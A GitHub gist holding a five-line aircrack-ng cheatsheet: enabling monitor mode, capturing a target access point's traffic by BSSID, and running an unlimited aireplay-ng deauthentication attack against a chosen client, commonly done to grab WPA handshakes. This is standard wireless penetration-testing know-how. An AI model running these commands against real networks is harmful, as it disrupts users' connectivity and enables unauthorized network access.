Skip to content

Instantly share code, notes, and snippets.

@b13bs
Created May 19, 2017 15:33
Show Gist options
  • Save b13bs/6c9b1a5815c5ce3b114619493be66078 to your computer and use it in GitHub Desktop.
Save b13bs/6c9b1a5815c5ce3b114619493be66078 to your computer and use it in GitHub Desktop.
cheatsheet for aircrack useful commands
airmon-ng start phy0
iwconfig wlan1mon channel $CHANNEL
iwconfig wlan1mon mode monitor
airodump-ng -c $CHANNEL --bssid $BSSID -w output wlan1mon
aireplay-ng -0 0 -a $BSSID -c $CLIENT wlan1mon
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment